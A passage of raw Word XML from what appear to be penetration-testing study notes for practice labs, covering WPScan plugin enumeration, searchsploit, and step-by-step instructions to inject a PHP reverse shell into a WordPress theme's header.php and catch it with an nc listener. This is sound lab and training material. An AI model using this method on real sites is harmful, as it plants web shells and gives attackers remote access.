      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows that WPScan discovered six active plugins in the target WordPress instance:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="780"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId960">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">akismet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="780"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId961">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">classic-editor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="780"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId962">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">contact-form-7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="780"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId963">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">duplicator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="780"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId964">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">elementor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D22">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="780"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId965">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">wordpress-seo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D23">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output also states that the Duplicator plugin version is outdated (so we can try attacking it)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D24">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of using WPScan's vulnerability database, let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find possible exploits for vulnerabilities in the installed plugins. For most of the identified plugins, WPScan provided us with the detected versions. Because most of the plugins are up to date and no version could be detected for akismet, let's start with Duplicator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit duplicator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D26">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7nq953r1zwom" w:id="398"/>
      <w:bookmarkEnd w:id="398"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin Privileges</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Editor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">header.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D27">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D28">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId966">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ColdBoxEasy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG Play) (</w:t>
      </w:r>
      <w:hyperlink r:id="rId967">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: it's possible that this revereshell only gets you into the www-data account, and not the admin. But, like in this writeup, it's a good foothold into the machine, and then you can privilege escalate to admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also go on google since there are a lot of resources for how to get reverse shell from WordPress (especially if you already on admin account):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="913"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId968">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.hackingarticles.in/wordpress-reverse-shell/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">appearance </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and then go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">editor </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">theme editor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Select the Header in right side. Here we can see a php code. We are going to change this code so that we would get a reverse-shell access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4338638" cy="4127809"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="211" name="image220.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image220.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId969"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4338638" cy="4127809"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In our terminal, go to "cd /usr/share/webshells/php". Select the php-reverse-shell.php by cat command to get the PHP code, so we will paste that into the wordpress header (another box also used index.php, the main index template, to inject the PHP shell. It was </w:t>
      </w:r>
      <w:hyperlink r:id="rId970">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BTRSys2.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy the code and paste it to the php header in the website (try leaving the PHP signature at the top of the code. And if there is an ending tag like ?&gt; then keep it)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4567238" cy="4050419"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="120" name="image114.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image114.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId971"/>
                    <a:srcRect b="0" l="0" r="39102" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4567238" cy="4050419"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try leaving the PHP signature at the top of the code. And if there is an ending tag like ?&gt; then keep it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change the IP to our IP and the port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for getting reverse shell and click upload or "update file"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1879600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="560" name="image543.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image543.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97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2D37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lnvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Refresh the wordpress site to get the connection in terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, it's possible that this revereshell only gets you into the www-data account, and not the admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To privilege escalate, look at the "How to privilege escalate in Wordpress after getting terminal" section below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
